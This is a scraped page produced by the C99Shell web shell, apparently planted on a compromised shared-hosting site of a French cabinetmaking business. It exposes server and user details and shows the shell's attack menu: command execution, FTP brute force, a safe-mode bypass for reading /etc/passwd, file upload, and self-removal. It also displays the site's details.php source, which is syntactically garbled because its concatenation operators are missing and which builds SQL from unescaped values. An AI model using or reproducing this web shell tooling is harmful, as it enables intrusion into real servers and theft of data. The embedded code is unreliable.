!C99Shell v. 1.0 pre-release build #16!

Software: Apache. PHP/5.4.45 

uname -a: Linux webm052.cluster007.gra.hosting.ovh.net 5.15.74-ovh-vps-grsec-zfs-classid #1 SMP Wed
Oct 26 09:50:47 UTC 2022 x86_64 

uid=763961(ebenisteaz) gid=100(users) groups=100(users) 

Safe-mode: OFF (not secure)

/home/ebenisteaz/www/   drwx---r-x
Free 0 B of 0 B (0%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     details.php (3.56 KB)      -rw----r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php require_once 'head.php'?>

</head>
<body class="">

    <div id="logo"><a href="index.php"><img src="./images/logo.png" /></a></div>

    <div id="contnaire">
        <div id="siteconstr">
            <ul id="jMenu">
                <li>
                    <a href="index.php">presentation    </a>
                </li>

                <li>
                    <a href="#">marine / fluvial </a>
                    <ul>
                        <li>
                            <a href="traveaux.php?trv=1">construction neuve</a>
                        </li>
                        <li>
                            <a href="traveaux.php?trv=2">RENOVATION</a>
                        </li>

                    </ul>
                </li>

                <li>
                    <a href="traveaux.php?trv=3">agencement & decoration</a>
                </li>
<li>
                    <a href="traveaux.php?trv=4">DIVERS</a>
                </li>
                <li>
                    <a href="javascript:void(0);" class="btnontact">contact</a>
                </li>


            </ul>



        </div>
        <br class="clear">
        <div id="blockDetails">
            <?php
            $id = (isset($_GET['projet']) && !empty($_GET['projet'])) ? $_GET['projet'] : "";
            $sqlProjet "SELECT * FROM `" TABLE_PROJETS "` WHERE active=1 and id='" $db->escape($id) . "'and type='projet' ORDER BY orderid ASC limit 1";
            $rowsProjet $db->query_first($sqlProjet);
            ?>
            <div id="blocTitre"><a href="traveaux.php?trv=<?php echo $rowsProjet['idparent']; ?>" >retour</a><h2><?php echo $rowsProjet['titrefr']; ?></h2></div>
            <div id="blockSlider"><div id="slider" class="nivoSlider">
                    <?php
                    $reqImg "SELECT * FROM " TABLE_GAL " WHERE id_bien='" $rowsProjet['id'] . "' and typePage='projet' order by orderid asc";
                    $reqImg = @mysql_query($reqImg);

                    while ($res = @mysql_fetch_array($reqImg)) {
                        echo '<img src="images/produits/' $res['nom'] . '" />';
                    }
                    ?>
                </div></div>
            <div id="blockBas" class="clear">
                <div id="blockVide" ></div>
                <div id="blockText"><p><?php echo nl2br(stripslashes($rowsProjet['missionfr'])); ?></p></div>
            </div>
        </div>
        <br class="clear">

        <div id="divForm">
            <div class="titreForm"><span>contact</span><br>Pour tous renseignements ou demande de devis veuillez nous contacter.</div>

            <form id="contact-form" name="contact-form" method="post" action="submitemail.php">
                <div id="col1">
                    <input type="text" placeholder="NOM" id="nom" name="nom" class="required"><br>
                    <input type="text" placeholder="TELEPHONE" id="tel" name="tel" class="required"><br>
                    <input type="text" placeholder="EMAIL" id="email" name="email" class="required email"><br>
                    <input type="text" placeholder="VILLE" id="ville" name="ville" class="required">

                </div>
                <div id="col2">
                    <textarea name="message" id="message" placeholder="MESSAGE" class="required"></textarea><br>
                    <input type="submit" id="submit" name="submit" value="ENVOYER">
                </div>

            </form>
        </div>
        <div id="copyright">Copyright © 2014 ebenisteriedandres.com All rights reserved.</div>

    </div>
    <?php require 'footer.php'?>
</body>

</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | Generation time: 0.0045 ]--